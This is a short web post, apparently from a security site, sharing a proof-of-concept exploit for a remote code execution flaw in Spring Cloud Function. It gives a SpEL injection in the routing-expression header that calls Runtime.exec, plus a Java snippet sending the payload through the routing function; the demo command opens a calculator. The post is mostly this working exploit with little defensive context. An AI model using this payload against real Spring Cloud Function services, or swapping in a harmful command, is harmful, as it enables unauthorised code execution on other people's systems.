in

Spring Cloud Function SPEL RCE Exploit

spring-spel-0day-poc

This is spring-cloud/spring-cloud-function Remote Code Exploit  POC

spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("open -a calculator.app")

POC:

Function function = functionCatalog.lookup(RoutingFunction.FUNCTION_NAME);
Message<String> message = MessageBuilder.withPayload("hello")
 				.setHeader(FunctionProperties.PREFIX + ".routing-expression",
 						"T(java.lang.Runtime).getRuntime().exec(\"open -a calculator.app\")")
 				.build();
function.apply(message);

Exploit credits: hktalent

For More details on the Vulnerability read RCE 0-day Vulnerability found in Spring Cloud (SPEL)

What do you think?

Written by SH

Leave a Reply

Your email address will not be published. Required fields are marked *

GIPHY App Key not set. Please check settings

Remote Code Execution on Western Digital PR4100 NAS (CVE-2022-23

Microsoft Azure Defender for IoT Code Execution